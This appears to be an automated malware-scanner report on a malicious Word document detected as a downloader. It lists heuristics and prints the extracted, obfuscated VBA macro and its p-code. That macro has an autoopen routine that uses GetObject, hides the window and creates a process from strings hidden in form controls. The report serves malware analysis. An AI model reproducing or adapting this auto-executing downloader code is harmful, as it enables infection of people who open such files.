MALICIOUS
190
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.00536d-6916066-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6916066-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set jxZDGUAw = GetObject(wADABkC.hUkoAA.ControlSource + zU_AGcZ.CDDA4CQA + wADABkC.hUkoAA.ControlTipText) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25127 bytes |
SHA-256: e8953d5b68fd5502f22858f8ed428d966b91b5adf618c6bcfe4786ff26020310 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hww4cUU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wADABkC"
Attribute VB_Base = "0{1861A4BE-5F6F-4903-A90E-D9BEC77F252B}{20268424-B388-4450-894A-A0CF95CFAF1C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zU_AGcZ"
Attribute VB_Base = "0{9B80721E-5450-4980-9FE3-C987B12A364C}{F3C03C08-B6B3-4B87-89A0-40AA4489CCB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "H4Z4xA"
Function DDABU_4()
If lxBAABxB = VUABBAGk Then
dkDBBA _
= ZwAccCU - 378615272 - 453946608 + _
CVar(289556260 - Atn(YCAwBADA / lACkA4 _
+ dZkZDZAA / Tan(729689948))) * (195892460 + Hex(845804993 _
/ Cos(TQ1AAck)))
End If
If G4QQA1AU = FAZ4Q4A Then
nXBAxX _
= L4AUQBQ - 257846855 - 861914610 + _
CVar(84260022 - Atn(f4A1_AA_ / mAcDDABA _
+ TAUACBA / Tan(178304468))) * (977888540 + Hex(328402884 _
/ Cos(DA4AA1o)))
End If
If mAkDZAZA = LQcAUAQ Then
J1QU4kZZ _
= EZokAXAA - 998489258 - 396888363 + _
CVar(156926403 - Atn(VXGxBA4 / FcoAc_ _
+ wAXUUc / Tan(338216398))) * (402260497 + Hex(729022449 _
/ Cos(uQA4cADQ)))
End If
End Function
Function JUoUAUw()
If CAA1ZAk = iAAwD4 Then
iBQDAA1 _
= P_CQ_GQ - 367921576 - 516882078 + _
CVar(550698567 - Atn(RxwD4x / Uk1QBBc _
+ lAcAkA / Tan(638409463))) * (752088292 + Hex(459434020 _
/ Cos(kBBADAAQ)))
End If
If U4C_Ax = EQXDDD Then
A4UUAC _
= vABXcQA - 882544217 - 110824657 + _
CVar(685872514 - Atn(ZAAZxZQx / bCQQDCBA _
+ s_Q__AA / Tan(296037713))) * (355504692 + Hex(296816906 _
/ Cos(QAGBAAD)))
End If
If ixCAwDB = JAAQ_1 Then
DAxkxwD _
= QXoUA1 - 700413680 - 699256916 + _
CVar(270013143 - Atn(LBQUGA / GUAAQA _
+ q1AAoA / Tan(68106818))) * (59592446 + Hex(678511507 _
/ Cos(WAkBXDAX)))
End If
End Function
Sub autoopen()
CAoCQQA
End Sub
Function CAoCQQA()
On Error Resume Next
If UGc__B = MkwAGcU_ Then
jAoABQcA _
= PkAUoX - 242575956 - 164560754 + _
CVar(920000426 - Atn(SQZA_Q / UCGwDQG _
+ E__U4UB / Tan(99831862))) * (811618026 + Hex(513729027 _
/ Cos(nAQGQAC)))
End If
If JkGQAx = wBDxBA Then
PAXBUDQ _
= j4AAAk - 79679781 - 944025743 + _
CVar(399116959 - Atn(tQQABBCA / RQAXCoG _
+ pDAAAUUG / Tan(681670082))) * (732451995 + Hex(6497310 _
/ Cos(Ux4ZoUc)))
End If
Set jxZDGUAw = GetObject(wADABkC.hUkoAA.ControlSource + zU_AGcZ.CDDA4CQA + wADABkC.hUkoAA.ControlTipText)
If wCQXxDA = MCDQxZ Then
RDAkQU _
= lAAQ_ADA - 662491697 - 881624057 + _
CVar(671411604 - Atn(jUUcZA / X4AAXXB _
+ IwG_11 / Tan(506748710))) * (528320386 + Hex(614817852 _
/ Cos(hokBXUGC)))
End If
If HAwBZAC = z4kQDGc Then
wDAx4Q _
= RXUkZG - 460184583 - 177368023 + _
CVar(948482138 - Atn(c_oAUUB / QBAQDU _
+ ikAGxAc / Tan(738520389))) * (222577712 + Hex(357517638 _
/ Cos(j4AAAUQD)))
End If
If 513391 = 513391 Then
If PwwGAAA = RDwAAAZ Then
JABZAA _
= AD4AAA - 495688597 - 544135281 + _
CVar(374874842 - Atn(RAcA_A / N4AcUoA _
+ pACX4UA / Tan(696973364))) * (228753354 + Hex(350747867 _
/ Cos(mAU_UAQw)))
End If
If rBcc1AD = bAxDAD Then
zDwAAA _
= oo__QQ - 856005483 - 298573077 + _
CVar(277165683 - Atn(zA_X4AQA / UAUAXA _
+ E4ACQQ / Tan(195613157))) * (641859564 + Hex(406535887 _
/ Cos(XUDwXAAQ)))
End If
jxZDGUAw.ShOwWiNdOw = wADABkC.RD4ZQABA + wADABkC.RD4ZQABA + wADABkC.RD4ZQABA
If ZA_AAAQ = GAkQAAZU Then
i4CADAcc _
= hU4QAAZ - 453024655 - 903030664 + _
CVar(812278855 - Atn(KACQBG / CUXA1oQ _
+ UQ_C_D / Tan(744615501))) * (753918957 + Hex(336280372 _
/ Cos(NAZUA_UU)))
End If
If OAACC1X = QAwB1Z Then
EADBDQ _
= IQGAcA - 887796242 - 534093518 + _
CVar(858414984 - Atn(FAQA4Ao / IUBB_ccC _
+ IDUBAZ / Tan(508815497))) * (640019530 + Hex(118954119 _
/ Cos(jUGAZC)))
End If
If UAX1AwwA = XQAkQZx Then
CAUGAk _
= YBQA_Q - 450057280 - 745528896 + _
CVar(444344681 - Atn(EBUCQAC / rAoUoA4D _
+ TAACAQ / Tan(24477982))) * (267140272 + Hex(974466706 _
/ Cos(TAk_GGD)))
End If
End If
If KAD4QAA = TABwQZ4 Then
uAAZAB _
= SAo41D - 570047475 - 390604421 + _
CVar(135376265 - Atn(dADGwAZ / WAAwcX _
+ qUAABZ_A / Tan(282612366))) * (981030456 + Hex(75640852 _
/ Cos(rUDwA4)))
End If
If JA_DU_4D = qDBGAA1 Then
jDAC1A_A _
= OocAQAxQ - 477333883 - 173571482 + _
CVar(620858657 - Atn(zQo4ABZ / z4k4Q_ _
+ vQx1QAB / Tan(945827683))) * (818840267 + Hex(42363574 _
/ Cos(r_1UGA)))
End If
If cXCAAA_ = wQAUAA1 Then
RkAAA_A _
= ODUAAX - 745893926 - 781188905 + _
CVar(175117392 - Atn(jDAXcUAD / vXGoAZ _
+ TZBXCA / Tan(352273675))) * (248909374 + Hex(503633502 _
/ Cos(h_ooxUCA)))
End If
Call GetObject(wADABkC.hUkoAA.ControlTipText + zU_AGcZ.vA4UDDA + wADABkC.hUkoAA.Text).Create((wADABkC.hUkoAA + zU_AGcZ.bUZxD_ + wADABkC.hUkoAA + zU_AGcZ.d4xAUoAC + wADABkC.hUkoAA.ControlTipText + wADABkC.hUkoAA.Text + zU_AGcZ.QAUADGAZ + wADABkC.hUkoAA.ControlSource + wADABkC.hUkoAA.ControlSource + zU_AGcZ.sAAAADA + wADABkC.hUkoAA + zU_AGcZ.rACZBQAB + wADABkC.hUkoAA), CQAADAU, jxZDGUAw, wADABkC.hUkoAA.ControlTipText)
If TA_ADc1G = wXAAUAAQ Then
A4UAkQA _
= BxA_okA - 136349607 - 424491792 + _
CVar(525927736 - Atn(bBQw_AB1 / n4AGQQUQ _
+ pXAAoA / Tan(401259258))) * (598454199 + Hex(742853795 _
/ Cos(AwB_A4BG)))
End If
If dkADUXC = OACAccA Then
NAXAoAA _
= iAxAwwZ - 117763166 - 83511370 + _
CVar(729090257 - Atn(VBAQwA / CUAcDA _
+ vwcA4G / Tan(369827568))) * (66168807 + Hex(584446552 _
/ Cos(lAooDUD)))
End If
End Function
Function jDA_BX()
If CU1ADcA = LAZcA1BA Then
b_ABwB _
= TAkAAG - 726368351 - 447956081 + _
CVar(355327600 - Atn(zkAAoAA1 / qBBcAQA _
+ DBAUAU / Tan(853299656))) * (311437508 + Hex(994551619 _
/ Cos(XCDAAA)))
End If
If JZ_cBAAB = BxG1BGkA Then
iAw4AA _
= wAkwCkX - 867197800 - 599233972 + _
CVar(240255208 - Atn(ic4DBA / fACkADAk _
+ mA1ZABAA / Tan(57297348))) * (567873302 + Hex(100639048 _
/ Cos(uQABAA)))
End If
If nUBwkU14 = XDAGwBB Then
q4QQABQU _
= ZkA1UABk - 262750850 - 354550015 + _
CVar(77617030 - Atn(TBAGUG / GAUBAwXA _
+ A4QAwXD / Tan(32407731))) * (339338847 + Hex(646884577 _
/ Cos(QQAAkG)))
End If
End Function
Function WoQACB1B()
If LDADGAoA = iAQQQUAD Then
WGG1CBcX _
= PBGADQ - 720973263 - 572757122 + _
CVar(65308611 - Atn(XwXA_Z / SXBAG1QA _
+ FAUGQD / Tan(98789695))) * (133374693 + Hex(895231563 _
/ Cos(joAoUc_Z)))
End If
If Xc4U4A = CAXAAA Then
bAoAXD _
= mAAGUAAA - 308976580 - 455180494 + _
CVar(581583829 - Atn(cwAZD_4U / ICAADQA _
+ YGcUAAA / Tan(911992433))) * (687647277 + Hex(919187534 _
/ Cos(RA_cUAU)))
End If
If lGoZww = s1A_CQ4 Then
ZCAAGQ _
= jCUUAw - 362720058 - 635362529 + _
CVar(163819757 - Atn(UwA_AxoD / iAAAQD _
+ ZAoAD41Z / Tan(923399253))) * (36138870 + Hex(58144961 _
/ Cos(oQowAAZA)))
End If
End Function
' Processing file: /opt/analyzer/scan_staging/99f8504661994c93862dbae8f8333983.bin
' ===============================================================================
' Module streams:
' Macros/VBA/hww4cUU - 1105 bytes
' Macros/VBA/wADABkC - 1158 bytes
' Macros/VBA/zU_AGcZ - 1156 bytes
' Macros/VBA/H4Z4xA - 10856 bytes
' Line #0:
' FuncDefn (Function H4Z4xA())
' Line #1:
' Ld DDABU_4
' Ld lxBAABxB
' Eq
' IfBlock
' Line #2:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld dkDBBA
' LitDI4 0x35E8 0x1691
' Sub
' LitDI4 0xACF0 0x1B0E
' Sub
' LitDI4 0x4724 0x1142
' Ld ZwAccCU
' Ld YCAwBADA
' Div
' Ld lACkA4
' LitDI4 0x2F5C 0x2B7E
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x14EC 0x0BAD
' LitDI4 0xF5C1 0x3269
' Ld dZkZDZAA
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St VUABBAGk
' Line #3:
' EndIfBlock
' Line #4:
' Ld TQ1AAck
' Ld G4QQA1AU
' Eq
' IfBlock
' Line #5:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld nXBAxX
' LitDI4 0x6E47 0x0F5E
' Sub
' LitDI4 0xC5F2 0x335F
' Sub
' LitDI4 0xB4B6 0x0505
' Ld L4AUQBQ
' Ld f4A1_AA_
' Div
' Ld mAcDDABA
' LitDI4 0xB5D4 0x0AA0
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x651C 0x3A49
' LitDI4 0x07C4 0x1393
' Ld TAUACBA
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St FAZ4Q4A
' Line #6:
' EndIfBlock
' Line #7:
' Ld DA4AA1o
' Ld mAkDZAZA
' Eq
' IfBlock
' Line #8:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld J1QU4kZZ
' LitDI4 0xBCAA 0x3B83
' Sub
' LitDI4 0x092B 0x17A8
' Sub
' LitDI4 0x81C3 0x095A
' Ld EZokAXAA
' Ld VXGxBA4
' Div
' Ld FcoAc_
' LitDI4 0xC5CE 0x1428
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x0211 0x17FA
' LitDI4 0xFFF1 0x2B73
' Ld wAXUUc
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St LQcAUAQ
' Line #9:
' EndIfBlock
' Line #10:
' EndFunc
' Line #11:
' FuncDefn (Function uQA4cADQ())
' Line #12:
' Ld JUoUAUw
' Ld CAA1ZAk
' Eq
' IfBlock
' Line #13:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld iBQDAA1
' LitDI4 0x09A8 0x15EE
' Sub
' LitDI4 0xFE9E 0x1ECE
' Sub
' LitDI4 0xFE47 0x20D2
' Ld P_CQ_GQ
' Ld RxwD4x
' Div
' Ld Uk1QBBc
' LitDI4 0x5AF7 0x260D
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0xF4E4 0x2CD3
' LitDI4 0x6824 0x1B62
' Ld lAcAkA
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St iAAwD4
' Line #14:
' EndIfBlock
' Line #15:
' Ld kBBADAAQ
' Ld U4C_Ax
' Eq
' IfBlock
' Line #16:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld A4UUAC
' LitDI4 0x8E59 0x349A
' Sub
' LitDI4 0x0CD1 0x069B
' Sub
' LitDI4 0x9582 0x28E1
' Ld vABXcQA
' Ld ZAAZxZQx
' Div
' Ld bCQQDCBA
' LitDI4 0x2D51 0x11A5
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x9234 0x1530
' LitDI4 0x110A 0x11B1
' Ld s_Q__AA
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St EQXDDD
' Line #17:
' EndIfBlock
' Line #18:
' Ld QAGBAAD
' Ld ixCAwDB
' Eq
' IfBlock
' Line #19:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld DAxkxwD
' LitDI4 0x76F0 0x29BF
' Sub
' LitDI4 0xD054 0x29AD
' Sub
' LitDI4 0x12D7 0x1018
' Ld QXoUA1
' Ld LBQUGA
' Div
' Ld GUAAQA
' LitDI4 0x3A42 0x040F
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x4EFE 0x038D
' LitDI4 0x4393 0x2871
' Ld q1AAoA
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St JAAQ_1
' Line #20:
' EndIfBlock
' Line #21:
' EndFunc
' Line #22:
' FuncDefn (Sub WAkBXDAX())
' Line #23:
' ArgsCall autoopen 0x0000
' Line #24:
' EndSub
' Line #25:
' FuncDefn (Function autoopen())
' Line #26:
' OnError (Resume Next)
' Line #27:
' Ld CAoCQQA
' Ld UGc__B
' Eq
' IfBlock
' Line #28:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld jAoABQcA
' LitDI4 0x6A54 0x0E75
' Sub
' LitDI4 0xFF72 0x09CE
' Sub
' LitDI4 0x17AA 0x36D6
' Ld PkAUoX
' Ld SQZA_Q
' Div
' Ld UCGwDQG
' LitDI4 0x5036 0x05F3
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x4EEA 0x3060
' LitDI4 0xE203 0x1E9E
' Ld E__U4UB
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St MkwAGcU_
' Line #29:
' EndIfBlock
' Line #30:
' Ld nAQGQAC
' Ld JkGQAx
' Eq
' IfBlock
' Line #31:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld PAXBUDQ
' LitDI4 0xD125 0x04BF
' Sub
' LitDI4 0xB08F 0x3844
' Sub
' LitDI4 0x0A9F 0x17CA
' Ld j4AAAk
' Ld tQQABBCA
' Div
' Ld RQAXCoG
' LitDI4 0x75C2 0x28A1
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x549B 0x2BA8
' LitDI4 0x241E 0x0063
' Ld pDAAAUUG
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St wBDxBA
' Line #32:
' EndIfBlock
' Line #33:
' SetStmt
' Ld zU_AGcZ
' MemLd GetObject
' MemLd hUkoAA
' Ld MSForms
' MemLd ControlSource
' Add
' Ld zU_AGcZ
' MemLd GetObject
' MemLd Form
' Add
' ArgsLd jxZDGUAw 0x0001
' Set Ux4ZoUc
' Line #34:
' Ld CDDA4CQA
' Ld wCQXxDA
' Eq
' IfBlock
' Line #35:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld RDAkQU
' LitDI4 0xD231 0x277C
' Sub
' LitDI4 0x83F9 0x348C
' Sub
' LitDI4 0xED94 0x2804
' Ld lAAQ_ADA
' Ld jUUcZA
' Div
' Ld X4AAXXB
' LitDI4 0x5F26 0x1E34
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x8782 0x1F7D
' LitDI4 0x603C 0x24A5
' Ld IwG_11
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St MCDQxZ
' Line #36:
' EndIfBlock
' Line #37:
' Ld hokBXUGC
' Ld HAwBZAC
' Eq
' IfBlock
' Line #38:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld wDAx4Q
' LitDI4 0xDC07 0x1B6D
' Sub
' LitDI4 0x6BD7 0x0A92
' Sub
' LitDI4 0xB05A 0x3888
' Ld RXUkZG
' Ld c_oAUUB
' Div
' Ld QBAQDU
' LitDI4 0xED45 0x2C04
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x4430 0x0D44
' LitDI4 0x4946 0x154F
' Ld ikAGxAc
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St z4kQDGc
' Line #39:
' EndIfBlock
' Line #40:
' LitDI4 0xD56F 0x0007
' LitDI4 0xD56F 0x0007
' Eq
' IfBlock
' Line #41:
' Ld j4AAAUQD
' Ld PwwGAAA
' Eq
' IfBlock
' Line #42:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld JABZAA
' LitDI4 0x9B95 0x1D8B
' Sub
' LitDI4 0xD871 0x206E
' Sub
' LitDI4 0x22DA 0x1658
' Ld AD4AAA
' Ld RAcA_A
' Div
' Ld N4AcUoA
' LitDI4 0xF834 0x298A
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x7FCA 0x0DA2
' LitDI4 0xFCDB 0x14E7
' Ld pACX4UA
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St RDwAAAZ
' Line #43:
' EndIfBlock
' Line #44:
' Ld mAU_UAQw
' Ld rBcc1AD
' Eq
' IfBlock
' Line #45:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld zDwAAA
' LitDI4 0x9B6B 0x3305
' Sub
' LitDI4 0xDD15 0x11CB
' Sub
' LitDI4 0x3673 0x1085
' Ld oo__QQ
' Ld zA_X4AQA
' Div
' Ld UAUAXA
' LitDI4 0xD1E5 0x0BA8
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0xFFEC 0x2641
' LitDI4 0x3ECF 0x183B
' Ld E4ACQQ
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St bAxDAD
' Line #46:
' EndIfBlock
' Line #47:
' Ld zU_AGcZ
' MemLd ShOwWiNdOw
' Ld zU_AGcZ
' MemLd ShOwWiNdOw
' Add
' Ld zU_AGcZ
' MemLd ShOwWiNdOw
' Add
' Ld Ux4ZoUc
' MemSt XUDwXAAQ
' Line #48:
' Ld RD4ZQABA
' Ld ZA_AAAQ
' Eq
' IfBlock
' Line #49:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld i4CADAcc
' LitDI4 0x9B8F 0x1B00
' Sub
' LitDI4 0x2788 0x35D3
' Sub
' LitDI4 0x6447 0x306A
' Ld hU4QAAZ
' Ld KACQBG
' Div
' Ld CUXA1oQ
' LitDI4 0xEE4D 0x2C61
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0xE3ED 0x2CEF
' LitDI4 0x3B34 0x140B
' Ld UQ_C_D
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St GAkQAAZU
' Line #50:
' EndIfBlock
' Line #51:
' Ld NAZUA_UU
' Ld OAACC1X
' Eq
' IfBlock
' Line #52:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld EADBDQ
' LitDI4 0xB212 0x34EA
' Sub
' LitDI4 0x9ECE 0x1FD5
' Sub
' LitDI4 0x5F88 0x332A
' Ld IQGAcA
' Ld FAQA4Ao
' Div
' Ld IUBB_ccC
' LitDI4 0xE889 0x1E53
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0xEC4A 0x2625
' LitDI4 0x1887 0x0717
' Ld IDUBAZ
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St QAwB1Z
' Line #53:
' EndIfBlock
' Line #54:
' Ld jUGAZC
' Ld UAX1AwwA
' Eq
' IfBlock
' Line #55:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld CAUGAk
' LitDI4 0x5440 0x1AD3
' Sub
' LitDI4 0xDE40 0x2C6F
' Sub
' LitDI4 0x2969 0x1A7C
' Ld YBQA_Q
' Ld EBUCQAC
' Div
' Ld rAoUoA4D
' LitDI4 0x811E 0x0175
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x3CB0 0x0FEC
' LitDI4 0x2E92 0x3A15
' Ld TAACAQ
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St XQAkQZx
' Line #56:
' EndIfBlock
' Line #57:
' EndIfBlock
' Line #58:
' Ld TAk_GGD
' Ld KAD4QAA
' Eq
' IfBlock
' Line #59:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld uAAZAB
' LitDI4 0x3BF3 0x21FA
' Sub
' LitDI4 0x2685 0x1748
' Sub
' LitDI4 0xAD89 0x0811
' Ld SAo41D
' Ld dADGwAZ
' Div
' Ld WAAwcX
' LitDI4 0x528E 0x10D8
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x5638 0x3A79
' LitDI4 0x3014 0x0482
' Ld qUAABZ_A
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St TABwQZ4
' Line #60:
' EndIfBlock
' Line #61:
' Ld rUDwA4
' Ld JA_DU_4D
' Eq
' IfBlock
' Line #62:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld jDAC1A_A
' LitDI4 0x897B 0x1C73
' Sub
' LitDI4 0x7D9A 0x0A58
' Sub
' LitDI4 0x8D21 0x2501
' Ld OocAQAxQ
' Ld zQo4ABZ
' Div
' Ld z4k4Q_
' LitDI4 0x2F63 0x3860
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x82CB 0x30CE
' LitDI4 0x6AB6 0x0286
' Ld vQx1QAB
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St qDBGAA1
' Line #63:
' EndIfBlock
' Line #64:
' Ld r_1UGA
' Ld cXCAAA_
' Eq
' IfBlock
' Line #65:
' LineCont 0x0010 01 00 00 00 08 00 00 00 11 00 00 00 21 00 00 00
' Ld RkAAA_A
' LitDI4 0x7026 0x2C75
' Sub
' LitDI4 0xFF29 0x2E8F
' Sub
' LitDI4 0x1450 0x0A70
' Ld ODUAAX
' Ld jDAXcUAD
' Div
' Ld vXGoAZ
' LitDI4 0x450B 0x14FF
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' Coerce (Var)
' LitDI4 0x0E3E 0x0ED6
' LitDI4 0xD65E 0x1E04
' Ld TZBXCA
' ArgsLd Cos 0x0001
' Div
' ArgsLd Hex 0x0001
' Add
' Paren
' Mul
' Add
' St wQAUAA1
' Line #66:
' EndIfBlock
' Line #67:
' Ld zU_AGcZ
' MemLd GetObject
' Ld MSForms
' MemLd Create
' Add
' Ld zU_AGcZ
' MemLd GetObject
' Add
' Ld MSForms
' MemLd bUZxD_
' Add
' Ld zU_AGcZ
' MemLd GetObject
' MemLd Form
' Add
' Ld zU_AGcZ
' MemLd GetObject
' MemLd Text
' Add
' Ld MSForms
' MemLd d4xAUoAC
' Add
' Ld zU_AGcZ
' MemLd GetObject
' MemLd hUkoAA
' Add
' Ld zU_AGcZ
' MemLd GetObject
' MemLd hUkoAA
' Add
' Ld MSForms
' MemLd QAUADGAZ
' Add
' Ld zU_AGcZ
' MemLd GetObject
' Add
' Ld MSForms
' MemLd sAAAADA
' Add
' Ld zU_AGcZ
' MemLd GetObject
' Add
' Paren
' Ld rACZBQAB
' Ld Ux4ZoUc
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.